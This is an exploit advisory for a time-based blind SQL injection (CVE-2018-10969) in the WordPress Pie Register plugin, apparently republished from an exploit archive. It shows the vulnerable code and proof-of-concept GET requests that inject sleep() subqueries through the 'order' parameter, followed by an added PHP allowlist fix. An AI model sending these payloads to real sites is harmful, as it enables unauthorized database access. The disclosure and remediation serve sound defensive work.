WordPress Pie Register Plugin < 3.0.9 - Blind SQL Injection Vulnerability

Author: Manuel Garcia Cardenas
Published: Jun 11, 2018
Source: 0day.today (1337DAY-ID-30567)

EPSS: 0.065 (percentile 93.7%)

Exploit for php platform in category web applications

# Title: WordPress Plugin Pie Register < 3.0.9 - Blind SQL Injection
# Author: Manuel García Cárdenas
# Software: WordPress Plugin Pie Register 3.0.9
# CVE: CVE-2018-10969
 
# I. VULNERABILITY
# WordPress Plugin Pie Register 3.0.9 - Blind SQL Injection
 
# II. BACKGROUND
# Pie-Register is a quick and easy way to brand your Registration Pages on
# WordPress sites.
 
# III. DESCRIPTION
# This bug was found in the following file of the plugin, where the "order"
# parameter is read directly from the request:
# /pie-register/classes/invitation_code_pagination.php:
#     if ( isset( $_GET['order'] ) && $_GET['order'] )
#         $order = $_GET['order'];
# Before the query is executed, the "order" parameter is only passed through
# esc_sql(), which is not sanitization for this context:
# /pie-register/classes/invitation_code_pagination.php:
#     $this->order = esc_sql( $order );
# esc_sql() escapes quote characters for values placed inside SQL string
# literals; a value inserted unquoted into an ORDER BY clause needs no quotes,
# so the injected SQL reaches the database unchanged.
 
# IV. PROOF OF CONCEPT
# The following URLs have been confirmed to suffer from time-based SQL injection.
 
GET /wordpress/wp-admin/admin.php?page=pie-invitation-codes&orderby=name&order=desc (original)
 
GET /wordpress/wp-admin/admin.php?page=pie-invitation-codes&orderby=name&order=desc%2c(select*from(select(sleep(2)))a) HTTP/1.1 (2 seconds of response)
 
GET /wordpress/wp-admin/admin.php?page=pie-invitation-codes&orderby=name&order=desc%2c(select*from(select(sleep(30)))a) HTTP/1.1 (30 seconds of response)
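A hardened way to build the sort clause for the request above, added here as an example and not taken from the plugin: the "orderby" and "order" values are matched against an allowlist instead of being escaped, because identifiers and keywords cannot be bound as prepared-statement parameters (the column names in the allowlist are assumed).

```php
<?php
// Added example, not the plugin's code: build ORDER BY from an allowlist.
// The column names below are assumed; substitute the table's real ones.

const ALLOWED_ORDERBY = ['name', 'code', 'created'];   // assumed column names
const ALLOWED_ORDER   = ['ASC', 'DESC'];

/**
 * Returns a safe "ORDER BY ..." fragment, or null when either value is not
 * on the allowlist. Quote-escaping (esc_sql) cannot help in this position:
 * a payload such as "desc,(select*from(select(sleep(2)))a)" contains no
 * quotes to escape and is appended to the query verbatim.
 */
function build_order_clause(?string $orderby, ?string $order): ?string
{
    $orderby = $orderby ?? 'name';
    $order   = strtoupper($order ?? 'DESC');

    if (!in_array($orderby, ALLOWED_ORDERBY, true)
        || !in_array($order, ALLOWED_ORDER, true)) {
        return null;   // caller falls back to the default ordering or answers 400
    }
    // Both pieces are now literals taken from our own lists, never request bytes.
    return sprintf('ORDER BY `%s` %s', $orderby, $order);
}

// Constructed request values, including the advisory's time-based payload.
$cases = [
    ['name', 'desc'],                                    // legitimate request
    ['name', 'desc,(select*from(select(sleep(2)))a)'],   // PoC payload: rejected
    ['id',   'asc'],                                     // column not allowlisted
];
foreach ($cases as [$orderby, $order]) {
    $clause = build_order_clause($orderby, $order);
    printf("orderby=%-6s order=%-40s => %s\n", $orderby, $order, $clause ?? 'REJECTED');
}
```

Rejecting rather than silently defaulting also gives the application a clear event to log, which is the signal a WAF or SIEM rule for time-based probes on this endpoint would key on.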

#  0day.today [2018-06-11]  #